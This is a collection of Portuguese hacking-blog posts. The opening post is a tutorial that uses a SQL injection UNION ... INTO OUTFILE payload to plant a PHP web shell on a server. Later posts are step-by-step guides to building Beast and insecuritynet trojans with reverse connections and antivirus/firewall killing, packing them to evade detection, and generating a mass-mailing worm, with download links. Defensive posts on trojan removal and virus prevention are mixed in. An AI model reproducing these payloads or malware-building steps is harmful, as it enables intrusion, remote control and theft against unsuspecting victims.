como enviar arquivo-virus para um servidor com sql injection

Como enviar um arquivo virus para um servidor com sql injection – Existem varias formas de enviar um arquivo para um servidor, porem neste caso iremos utilizar a forma do sql injection.

A maioria das pessoas sabe que a injeção SQL permite que atacantes para recuperar registros do banco de dados, passe telas de login, alterar conteudo no banco de dados, porem poucas pessoas sabem que é possivel enviar um arquivo para o servidor através do banco de dados, ou seja, caso o servidor esteja vulneravel, o atacante pode injetar um codigo malicioso para enviar um arquivo shell, virus, arquivo em geral para o servidor e atravez do mesmo ter acesso root ao servidor do auvo.

Esquecendo o metodo iniciante para passar por telas de login e senha e ter acesso ao CMS ou area restrita, agora iremos para o metodo um pouco mais avançado.

Comando 1 – INTO OUTFILE – Criar arquivo e escrever no mesmo
MySQL tem um comando embutido que pode ser usado para criar e gravar arquivos de sistema. Este comando tem o seguinte formato:
mysql> select “aqui é o texto que ficará dentro do arquivo, neste caso .TXT” INTO OUTFILE “httpdocs/pasta/arquivo.txt”.
Uma grande desvantagem deste comando é que ele pode ser adicionado a uma consulta existente usando uma  SQL para UNIÃO.
Por exemplo, pode ser anexado a seguinte consulta:

select user, password from user where user=”admin” and password=’123′ union
select “text”,2 into outfile “/tmp/file.txt” — ‘

ou seja, podemos adicionar um arquivo de modo muito facil.

Comando 2 – LOAD_FILE – ler arquivos do servidor

MySQL tem um comando interno que pode ser usado para ler arquivos arbitrários. A sintaxe é muito simples. Vamos usar este comando para o plano B.
mysql> select load_file(“path_to_file”);

Este comando arquivo que nem precisa explicar como funciona.

WEBSHELL
WebShell é uma ferramenta muito utilizada nos dias atuais.

Podemos utilizar os comandos acima para criar uma shell, sendo que nesta shell irá executar comandos a partir do navegador web. Muito usado.

Vamos criar um WebShell muito simples que irá executar comandos shell independente do sistema operacional.
Aqui está o código de uma base muito simples em PHP.

<?php echo shell_exec($_GET['cmd']); ?>
para quem não sabe ler programação, pegue um livro já e começe a ler. O comando acima está irá executar comandos a partir de codigos passados via GET, exemplo: http://www.auvo.com.br/shell.php?cmd=ls

O exemplo acima ira listar todos os arquivos e pastas do servidor.

Exploit injeção de SQL – criar web shell
Você precisa adicionar a seguinte string para o comando SQL:
UNION SELECT “<?php echo shell_exec($_GET['cmd']); ?>”, 2,3,4 INTO OUTFILE “/ var / www / html / temp / c.php” -
Algumas explicações:
• 2,3,4 são apenas qualificador que costumava fazer o mesmo número de colunas, como na primeira parte da consulta seleção.
• / var / www / html é um diretório web default nas distribuições RedHat-like (Fedora, CentOS).

BY: invkloip

como se proteger contra a ameaça do virus keylogger

seguranca em rede - Sql injection

Revisando, o que é um Keylogger?

Quais os tipos de Keyloggers?

O que é stuxnet, tutorial stuxnet,onde baixar o stuxnet

Agora vou falar um pouco sobre o  stuxnet, o que é o stuxnet e um tutorial breve sobre o mesmo.

Stuxnet é um worm de computador projetado especificamente para atacar o sistema operacional SCADA, desenvolvido pela Siemens para controlar as centrífugas de enriquecimento de urânio iranianas. Foi descoberto em junho de 2010 pela empresa bielorrussa desenvolvedora de antivírus VirusBlokAda. É o primeiro worm descoberto que espiona e reprograma sistemas industriais. Ele foi especificamente escrito para atacar o sistema de controle industrial SCADA, usado para controlar e monitorar processos industriais. O Stuxnet é capaz de reprogramar CLPs e esconder as mudanças. O vírus pode estar camuflado em mais de 100 mil computadores, porém, para sistemas operacionais domésticos como o Windows e Mac OS X, o worm é inofensivo, só funciona efetivamente nas centrífugas de enriquecimento de urânio iranianas, já que cada usina possui sua própria configuração do sistema SCADA.

Origem do Stuxnet

A origem do Stuxnet ainda não foi definida, sabe-se que provavelmente tenha sido desenvolvido a mando de um país, teoria defendida por Mikka Hypponen, não sendo possível o seu desenvolvimento por usuários domésticos e necessitando-se de informações sobre o funcionamento da usina de difícil acesso

Ataque

O Stuxnet foi o primeiro worm de computador a incluir um rootkit de CLP. Também é o primeiro worm conhecido a ter como alvo infraestrutura industrial crítica. Ainda, o alvo provável do worm foi a infraestrutura do Irã que utiliza o sistema de controle da Siemens. De acordo com jornais, a infestação do worm pode ter danificado as instalações nucleares iranianas de Natanze acabou atrasando o início da produção da usina de Bushehr. A Siemens, inicialmente, declarou que o worm não causou nenhum dano. Além do Irã, também foram afetados pelo worm Indonésia, Estados Unidos, Austrália, Inglaterra, Malásia, e Paquistão. Como a usina não tem computadores conectados à Internet, a infecção deve ter ocorrido quando um dispositivo com o vírus foi conectado aos computadores da usina.

No complexo de Dimona, no deserto de Negev, em Israel, funcionavam centrífugas nucleares virtualmente idênticas às localizadas em Natanz, o que permitiu testar o Stuxnet em condições muito próximas das reais, antes de desfechar o ataque real. O worm tinha duas funções. A primeira delas era fazer com que as centrífugas iranianas começassem a girar 40% mais rapidamente por 15 minutos, o que causava rachaduras nas centrífugas de alumínio. A segunda forma inicialmente gravava dados telemétricos de uma típica operação normal das centrífugas nucleares, sem que o alarme soasse, para depois reproduzir esse registro para os operadores dos equipamentos enquanto as máquinas, na verdade, as centrífugas estavam literalmente se destruindo sob a ação do Stuxnet sem que os funcionários soubessem.

A empresa russa desenvolvedora de antivírus Kaspersky Lab lançou um comunicado descrevendo o Stuxnet:

“Um protótipo funcional e temível de uma cyber-arma que
dará início a uma nova corrida armamentista no mundo.”

Tutorial shark trojan, como usar o trojan shark

t

como criar um worm, criando um worm

Iae galera do mal ou com o intencional.

Vi um post na internet em um blog chamado de freehacker.

Gostei do tutorial.

Como criar um worm e infectar toda a uma rede.

Então resolvi postar o mesmo post aqui no meu blog.

Primeiramente quero explicar o que é um worm.

Um Worm (verme, em português), em computação, é um programa auto-replicante, semelhante a um vírus. Entretanto um vírus infecta um programa e necessita deste programa hospedeiro para se propagar, já o Worm é um programa completo e não precisa de outro programa para se propagar.

Basta que alguém da rede clique no bendito worm que todos os computadores que tiverem conexão com o computador infectado, pegará o vírus também.

Não vou hospedar esse arquivo, porem irei passar o link do freehacker.

O nome do programa é VBswg 2, que pode ser baixado aqui!

OBS: Esse programa quem não souber mexer nele, pode desistir de qualquer profissão que tenha que mexer com computadores.
Após ter feito o download, abra o programa… é só criar seu worm…

Agora com o programa aberto vamos configurar nome do worm, para onde ele vai ser copiado, qual sera a extenção e etc…
• Em Worm name vc bota o nome do seu worm.
• Em You name vc pode botar seu nome, apelido ou outra coisa…
• Em File name vc repete o nome do seu worm.
• Em Copy worm to vc bota o diretório para onde seu worm será copiado.
• Por ultimo vc escolhe e extenção do seu worm, veja a imagem:

Agora, clicando no botão E-mail que está ao lado do botão Startup. Aqui o Worm envia um e-mail para todos os contatos da vítima infectada, então fica a seu gosto a mensagen.
O resto basta ler.

ESSE PROGRAMINHA BASICO TEM ALGUMAS OPÇOES LEGAIS,como por exemplo: antidetecçao(evitar detecçao do anti-virus), Encryptar programa(evitar tambem a detecçao de antivirus), Join exe(agregar outros programas), polymorphic(Polimorfico é o ato do virus produzir copias operacional de si mesmo para outros lugares do computador), porem ainda é meio FRACO.

Fonte: freehacker

email bradesco falso instala virus, como mandar um email com outra identificaçao

Ei pessoal, hoje eu dei muita risada. Pois estava eu lendo meus email, quando eu recebo um email falso do banco Bradesco falando para mim baixar um programa que ajudaria a segurança da informação que usuária um protocolo de criptografia SSL 3.0.

Eis, o email abaixo:

Daí, eu com toda a minha curiosidade, para saber si o banco Bradesco estava mandando os seus clientes baixarem esse programa, passei o mouse por cima do link que eles mandaram para baixar, daí encontrei o seguinte link:

http://seguranca.nzccp.co.cc/instalar.php?ID=824578

DAÍ, eu comecei a dar risada.kkkkkkkkk

Alguém me manda um spam e ainda por cima indicando um domínio grátis, que isso eu tenho certeza que o Bradesco não usa.

Porque, estou postando isso?

Estou postando isso porque, quero saber si vocês  sabem a diferença entre smtp e pop3?

Si não sabem então entrem neste meu post:

http://juancarloscunha.wordpress.com/2009/05/28/qual-diferenca-entre-smtp-e-pop3/

As vezes vocês devem si perguntar?

Como eu posso mandar um email para para uma pessoa, e com a identificação de outra pessoa,…Leiam o tópico que vocês irão saber.

Porem, si alguém deseja si aprofundar no assunto, mande um email para mim que eu ajudarei.

E posso até ensinar você mandar um email para uma pessoa com outra identificação, semelhante ao do email falso visto acima.

Retirando trojans e keyloggers, como retirar um trojan-virus do meu computador, usando um trojan, retirando um beast do computador, chat do beast, retirar trojan por detecçao de porta

Para quem perguntou pra mim si eu poderia mostrar as imagens do trojan… Criei um post com a simulaçao real e verdadeira de um ataque usando trojan… Primeiramente eu mandei o trojan para a vitima com o trojan camuflado e comprensado para ninguém perceber, então quando a vitima executou o trojan, eu criei um trojan de conexão reversa(a vitima si conecta no invasor), e então eu já estava esperando a conexão reversa com o beast aberto e listando as conexões [SIN]. Quando a minha vitima clicou no trojan, depois de mais ou menos 10 segundos o computador dela si conectou em min.

Primeira coisa que eu fiz, foi listar todos os programas e pastas ativos na maquina alvo.

Eu também vi todos os processos da maquina alvo.

Depois, disso vi que não tinha nada pra mim pegar ou saber… Então pensei em fazer uma Baguncinha… Mandei uma mensagem de error para o computador da vitima dizendo que a maquina dela seria desligada em 2 minutos.

Eu fiz também uma coisa que eu acho muito tosca… Que é: chat, entre a vitima e o invasor…

Muito tosco, porem fiz porque precisava mostrar isso em um post no blog….

Então, quando o alvo do invasor descobriu que tinha um trojan na sua maquina ele começou a si desesperar. Pois alem de ter um trojan na sua maquina, o invasor estava conectado…

OBS: lembrando que isso só foi uma encenação ..  eu estava manejando os dois computadores…o do alvo e o do invasor

_________________________FIM_____________________

Quando você percebe que tem um invasor conectado na sua maquina, primeira coisa que eu aconselho a fazer, é manter-si calmo. Depois da calma, desconecte seu computador da internet, assim barraremos a conexão do invasor, si não saber desconectar, somente retire o cabo RJ-45(cabo de rede), para retirar os virus de seu computador.

Existem vários métodos para si retirar um vírus da sua máquina/PC, citarei aqui algumas das maneiras, sugiro que você pesquise mais sobre elas, enquanto eu não posto um post mais detalhado sobre cada assunto.

Métodos eficazes e os não tão eficazes de se retirar o programa
Basicamente existem quatro métodos de se retirar um cavalo de tróia. Cada um possui suas vantagens e falhas. O ideal seria usar um pouco de todos.

Detecção por portas
Esse é um método utilizado por programas como o Xôbobus, o meu Anti-Trojans e muitos outros. Funciona do seguinte modo: os programadores estudam as portas TCP e UDP utilizadas pelos trojans e criam um programa que abre essas portas. Assim, quando um invasor vir a porta aberta e pensar que é um cavalo de tróia que está instalado ali, cairá em uma armadilha tendo o seu endereço IP detectado. Esse método não é muito eficiente pois…Veja: http://www.invasao.com.br/2008/02/16/como-detectar-e-retirar-trojans-sem-precisar-de-anti-virus-e-firewalls/
facilmente podemos mudar as portas que os trojans utilizam. Mas ainda é um método muito usado pois muitas pessoas não se lembrar de trocar as portas.

Detecção pelo arquivo
Esse é o método usado pelos anti-vírus e o programa The Cleaner. Ele detecta o trojan checando a sua estrutura. Se o arquivo estiver renomeado (sem ser para executável) ou estiver comprimido, esse método se torna inútil. Para ser realmente eficaz, deve ser usado junto à detecção de portas. Assim, mesmo que seu anti-vírus não encontrou um trojan, o Anti-Trojans pode encontrar.

Detecção por string
Na minha opinião, o melhor método de todos. Pouco divulgado publicamente, se torna a melhor garantia para se detectar um trojan sem falhas. Isso porquê mesmo que o programa for comprimido ou mude suas portas, ele ainda estará usando uma das 65535 portas do sistema e
se comunicará com o cliente. A comunicação entre cliente e servidor se dá por uma string (texto) enviada. Por exemplo: O Netbus 1.7 envia uma string assim “Netbus 1.7x” quando alguma conexão é estabelecida. Se for o cliente, ele responderá com outra string. Então para analisar todas as portas do seu sistema e saber quais estão abertas e possuem strings, utilize um programa como o Chaoscan ou algum outro scanner de porta que lhe dê essas
informações.

Detecção manual
Muito eficaz também, a checagem manual do sistema pelo operador pode facilitar muito a vida. Olhando registro, arquivos de inicialização, conferindo os programas carregados na memória, o tamanho dos arquivos, etc… Todas essas precauções evitam dores de cabeça. Essa política adotada junto aos outros tipos de detecção faz com que você exclua em 100% a chance de uma invasão por cavalos de tróia.

RECOMENDO A VOCES PESQUISAREM MAIS SOBRE O ASSUNTO
Primeira, coisa que eu fiz para retirar esse vírus foi verificar cada processo em execução do computador, então percebi que tinha um arquivo diferente chamado… svchost1.exe.

Para quem não sabe ter informações dos processos ativos, vá em…

Iniciar->Todos os programas->Acessórios-> ferramentas do sistema->informações do sistema

OU, então somente vá em, iniciar -> executar -> e digite: msinfo32.exe.

Já dentro do programa do Windows, vá em inicialização e processos… Lá vai ter varias informações que podem ser úteis para pegar esse vírus.

Os trojan, costumam voltar depois que você exclui, então não basta você saber onde está o vírus e então exclui-lo, pois ele voltará.

Para ele não voltar você tem excluir todos os vestígios do trojan, que geralmente fica dentro da pasta…

C:recycler…………

C:windowsmsagent…….

C:windows…….

C:windowssystem32

Vá em iniciar -> executar -> digite: msconfig e de enter, vá na aba inicializar, lá estará todos os processos que são iniciados junto com o sistema operacional Windows.

Instale o anti-virus kaperskay no seu computador e  faça um escaneamento.

Concerteza pegará…

Si com tudo que você fizer o virus não sair(coisa impossível), então instale o avast profissional na sua maquina, pois tem vírus que o avast pega que o kaspersky não pega e assim vice e versa. Com todos os anti-virus.

Si mesmo assim não sair o vírus, então instale o the cleaner, pois os trojan tem muito medo deste programa(anti-trojan).

Agora, si você tentou de todos os modos e não saiu esse vírus, basta você formatar seu computador.

Invadindo Computadores com trojan, criando um trojan, como fazer um trojan insecuritynet

O insecuritynet gera um trojan indetectavel.

ENTENDENDO O QUE É UM TROJAN

Trojan ou Cavalo de Tróia é um programa que age como a lenda do cavalo de tróia.

entrando no computador , e liberando uma porta para um possível invasor.

Os trojans atuais são divididos em duas partes: o servidor e o cliente Normalmente, o

servidor está oculto em algum outro arquivo e, no momento que esse arquivo é executado,

o servidor se instala e se oculta no computador da vítima; a partir deste momento, o

computador pode ser acessado pelo cliente, que irá enviar informações para o servidor

executar certas operações no computador da vítima.

Resumindo :

Servidor é o vírus trojan q vai se instalar no pc da vítima

Cliente é o insecuritynet que esta no seu computador.

E vc precisa de um endereço para conectar o servidor ao cliente ,este endereço é o IP

Ferramentas do trojan

- Acesso total ao computador remoto via prompt de comando

Você pode fazer o que quiser: criar pasta, deletar arquivos, mover arquivos, abrir

programas, etc.

- Criar log de arquivos pessoais do computador remoto.

O trojan Inet 1.1 cria um log com todos os arquivos pessoais da vitima, e você pode baixar

este arquivo para análise. Assim você não perde tempo procurando.

- DNS SpoofVocê pode envenenar a navegação de internet do computador remoto,

você pode fazer a vitima digitar um endereço se um site e ser redirecionado

automaticamente para o site que você escolher.

- Cookies

Você visualiza os cookies do Internet Explorer e do Firefox no computador remoto.

Escolha a opção 1 – criar trojan

Vamos usar a opção 3 (inicia quando o trojan for executado e toda vez que o Windows for

iniciado)

Vamos compactar nosso trojan, digite “S”

O nome do trojan que eu escolhi é “vídeo_legal”

Pronto, nosso trojan está prontinho na nossa pasta de trabalho.

Vamos descompactar.

Agora você camufla o trojan do jeito que você preferir, usando joiner, winrar, engenharia

social, etc.

agora falta nós si conectar-mos no trojan, então vamos lá:

Conectando-se ao trojan

Depois que você enviou o trojan e tiver certeza que ele foi executado, ai você pode se

conectar a ele. Para isto é necessário você saber o IP do computador remoto.

Agora temos varias opções, vamos ver uma a uma.

1-   Abrir Shell CMD

Pronto, ganhamos a Shell.

O C: é todo nosso.

Vamos ver o tem no C:

Digite DIR

Bem fácil né!

Bom, na ultima vez que falei sobre trojan, eu citei o beast, porem existem muitos outros trojans desconhecidos ai no mundo da web que ninguém sabe onde e como entrou em um computador.

Esse so foi um dos trojans existentes na web e em todos os lugares!

Obs: para que ninguém possa perceber que você está mandando um trojan, faça o seguinte…

FAÇA A COMPRENSAO DO TROJAN, PARA DEIXA-LO INDETECTAVEL, LOGO APÓS, COMBINE(AGREGE) ELE COM OUTRO PROGRAMA OU FOTO.

SI GOSTOU, NÃO ESQUEÇA DE COMENTAR!

Download:

Tamanho 27,3 MB

Sistema: Windows XP

http://www.insecuritynet.com/Download.html

IMPORTANTE: Baixe apenas do site oficial (Livre de virus)

Alguns anti-virus (como o NOD32) pode detectar o insecuritynet porque ele cria trojans,

possui sniffer. Para sua segurança baixe apenas do site oficial, mesmo se seu Anti-virus

detectar, no site oficial do software é seguro.

No site você também encontra um manual on line totalmente em português, tutorias de

como criar os trojans, como capturar IP no orkut, vídeo aulas…

Como registrar

Você pode baixar o software e usar normalmente, porem algumas funções só funcionam

com o software registrado.

Tutorial de como registrar:

http://www.insecuritynet.com/Registro.html

beast trojan, criar servidor com beast, trojan de terceira geraçao, melhor trojan de todos

Aqui estou mais uma vez escrevendo mais este post, porem desta vez falando do trojan de terceira geração, um dos melhores trojans do mundo. quase Todo hacker que quer ter controle total sobre o computador da vitima usa esta belíssima ferramenta.
Então vamos lá.
Primeiramente quero falar um pouco de como fazer uma invasão com este trojan…
Muitos hackers iniciantes colocam complicações quando o assunto é trojan, pois geralmente eles nunca usaram e acham que é muito difícil. Quero acabar com este paradigma, pois fazer uma invasão com um trojan é mais fácil do que comer batatinha… É tão fácil que quando o hacker cria um arquivo  pelo trojan para mandar para vitima… quando a vitima recebe este trojan, basta a vitima ao menos clicar que o trojan si instala no pc e dai pra frente é só diversão para o invasor e complicação para o alvo.
Outras pessoas falam que é difícil, pois geralmente o anti-virus da pessoa(alvo) detecta o virus, por isso eu digo e mostro a vocês um programa chamado petite…
este programa é para minimizar o tamanho do arquivo, assim complicando a detecçao do anti-virus do alvo, dai somente um anti-virus como o kaspersky com tudo actualizado  identificará seu trojan.
Então vamos lá…
1 passo vou mostrar a aparência do nosso trojan(beast)…

Este trojan é tao facil de usar que até uma criança de 8 anos daria conta de utiliza-lo. As opçoes dele é bastante obvia…
Nele tem uma opçao chamada “Build Server”, que serve para criar o trojan para mandar para o alvo…Clique na opçao

Nesta pagina do programa, voce criará o seu trojan para enviar para vitima…
Escolha o nome do seu trojan
Obs: o nome ficará executando no gerenciador de tarefas do windows… entao si voce escolher um nome igual de algum processo do windows a pessoa nunca identificará só olhando os processos…

PASS – serve para colocar senha para voce si conectar no computador da vitima, assim limitando as pessoas a si conectarem na sua vitima…
Injection – Serve para voce injetar o trojan em algum programa da vitima(esconder o trojan em um programa .dll)

Listen port , Sin port -  será a porta de conexao no alvo e a porta de conexao reversa
Obs… Esta opçao de conexao reversa é muito interessante, pois ao invés de voce si conectar a vitima, a vitima que si conecta a voce… exemplo: quando o computador da vitima for ligado e conectado a internet, automaticamente o trojan da vitima si conectará a voce.
OBS… esta opçao nao é boa para voce mandar para pessoas que possuem firewall, pois o firewall barrará todas as conexoes de saidas do computador.. Si seu alvo tiver um firewall, entao faça uma injeçao em algum programa, pois o firewall dará liberdade para as conexoes reversa sem saber.

Clique em notifications – Esse será o ip para a conexao reversa( o seu ip para o trojan si conectar)

E tem outras opçoes ai tambem para voce ser notificado por email, icq ou algum CGI qualquer…
clique em StartUP

StartUP -  esses motodos sao muito interessantes, pois faiz o trojan inicializar primeiro que todos os processos do computador da vitima..

clique em AV-FW KILL

AV-FW KILL – esta opçao faz para todos os processos do computador da vitima, inclusive o Firewall do windows e anti-virus em um tempo determinado

Clique em Misc…

Misc – Isso talvez seja uma baboseira, porem tem gente que precisa… Serve para configurar um keylogger, COnfigurar mensagens de erro..

LOgo após clique em Exe Icon…

Exe Icon – Você pode escolher o ícone que seu trojan irá ficar….

Logo após escolher o ícone, basta clicar para salvar em “SAVE SERVER”…

E depois voltar para a primeira pagina do programa….
Si você mandar seu anti-virus scannear o trojan criado, concerteza ele o detectará….
Então para deixa-lo indetectavel…
basta baixar um programa chamado petite que citei acima… Este programa ele é muito simples de usar basta procurar o programa que você quer deixar indetectavel e clicar em start

Agora é só mandar para o computador da vitima!

Olhem este video do beast

http://www.youtube.com/watch?v=x6wyZbwdvIM

previnir contra virus

1
A primeira dica é muito óbvia, Porem muita gente ainda cai. Nunca abra arquivos enviados por estranhos. Caso fique em dúvida sobre a origem, é melhor sempre agir com cautela e não abrir até que se possa confirmar a origem.

2 – Desconfie de mensagens estranhas
Muitos vírus hoje em dia se auto-enviam para outras pessoas sem o conhecimento do usuário infectado. Por isso, desconfie mesmo se o remetente do arquivo for conhecido.

3 – Desconfie de arquivos enviados por conhecidos
Mesmo quando o remetente é conhecido e a mensagem não tem nada de suspeita, vale a pena desconfiar. Quem garante que aquele joguinho bobo não esconde um vírus?
4 – Fique de olho nas extensões
Uma boa dica para decidir se abre ou não o arquivo é observar as três últimas letras, conhecidas como extensão de arquivos.exemplo: arquivo.gif. De modo geral, estes arquivos são considerados seguros. Porém tente observar bem as extençoes, pois existem arquivos com espaços, e isso pode enganar,

exemplo: arquivo.jpg__________________________.exe
Observe que lá no final do nome do arquivo tem uma extençao executável.
5 – Habilite o alerta de macros
Outra forma comum de espalhar vírus é através de macros, pequenas instruções que podem ser embutidas em arquivos da plafatorma Office (Word, Excel, PowerPoint, Acess). Devido à popularidade, o Word é o preferido dos criadores de vírus. Fique de olho em arquivos .doc, .xls, .ppt e .mdb e configure seus programas do Office para exibir alertas antes de abrir arquivos com macros.

6 – Leia e-mails em formato texto
Há vírus que se propagam via Internet mesmo sem que o usuário abra um arquivo anexo. Eles vêm inseridos em páginas Web que o usuário recebe em seu e-mail. Basta que o usuário abra a mensagem para ser inrfectado. Para evitar esse problema, o mais seguro é configurar seu programa de e-mail para exibir mensagens no formato texto puro. Assim, nenhum código malicioso funcionará.

7 – Instale um antivírus
Toda a cautela do mundo não é suficiente sem um bom antivírus. Ele funciona sempre que o computador está ligado e pode evitar que um descuido momentâneo cause problemas sérios.

8 – Atualize o antivírus
A cada dia surgem dezenas de novos vírus e para se manter salvo das pragas o ideal é atualizar o antivírus uma vez por semana ou, no máximo, por mês. Os programas normalmente têm ferramentas específicas para esta finalidade.

9 – Não ligue o computador com disquete no drive
Embora meio fora de moda, os vírus de boot ainda podem causar estragos. Eles normalmente são transmitidos através de disquete. Portanto, é sempre bom ficar atento para não deixar disquetes no drive. Caso o computador seja ligado com um disquete infectado, pode haver contaminação no setor de boot do disco rígido.

10 – Integre o anti-vírus a outros programas
A maior parte dos antivírus atuais pode ser integrada para funcionar em conjunto com programas de e-mail e outros aplicativos. Aproveite estes recursos para detectar as pragas assim que aparecem no seu computador.

11 – Instale um firewall
Internautas que se conectam através de serviços de banda larga, como Speedy, Velox e Virtua, ficam mais vulneráveis a ataques de hackers e contaminação por vírus. O ideal é instalar um software de firewall. Além do antivírus, estes programas contêm ferramentas de monitoramento de redes, que impedem tentativas de invasão de computadores.

12 – Cuidado ao navegar
Embora seja pouco comum, é possível criar páginas na Internet com códigos maliciosos e invadir computadores dos internautas ou induzi-los a fornecer informações sigilosas. Por isso, atenção redobrada ao navegar em sites suspeitos.

13 – Suspeite de downloads
Hackers costumam colocar vírus disponíveis em suas páginas com nomes de outros programas. Por isso, baixe arquivos somente de sites oficiais ou de credibilidade conhecida.

14 – Cuidado em salas de chat e IRC
Salas de bate-papo e IRC são terreno fértil para a distribuição de vírus por anônimos. Por isso, desconfie daquele programinha sensacional que seu amigo recém-conhecido no IRC resolveu lhe passar de mão beijada.

15 – Atenção redobrada com a rede
Quem trabalha em locais com vários micros deve ter muito mais atenção, pois há diversos vírus que se espalham através da rede. Desta forma, seu computador pode ser contaminado devido ao descuido de outro funcionário. Nestes casos o melhor é instalar antivírus em todas as máquinas e orientar todos os operadores da rede sobre os riscos de vírus.

16 – Inscreva-se em newsletters
As maiores empresas antivírus do mercado publicam regularmente boletins informativos com os últimos vírus, além de alertas em casos muito graves. Assine estes boletins para se manter informado.

17 – Utilize o suporte
Muita gente não sabe, mas ao comprar um antivírus o usuário também tem direito a suporte dos técnicos da empresa. Se estiver em dúvida sobre um e-mail suspeito, ligue ou mande um e-mail para o suporte.

18 – Cuidado com programas de troca de arquivo
Programas de troca de arquivo como KaZaa e LimeWire são terreno fértil para os criadores de vírus, pois garantem a anonimidade. Além do perigo de baixar arquivos de desconhecidos, já mencionado, vale ressaltar que já existem vírus especificamente projetados para se espalhar neste tipo de plataforma. Eles criam arquivos com nomes atraentes e os compartilham com outras pessoas sem o conhecimento do usuário infectado.

19 – Observe o desempenho do micro
Lentidão repentina, falta de ícones e dificuldade em abrir programas podem ser sintomas de infecção. Caso a performance do seu computador seja alterada sem motivo aparente, faça uma varredura pelo antivírus para detectar possíveis pragas.

20 – Faça um backup de arquivos
Fazer um backup de todos os arquivos periodicamente é um processo complicado e que leva tempo, mas pelo menos os arquivos mais importantes devem ter cópias de segurança em disquetes, CDs ou zip disks.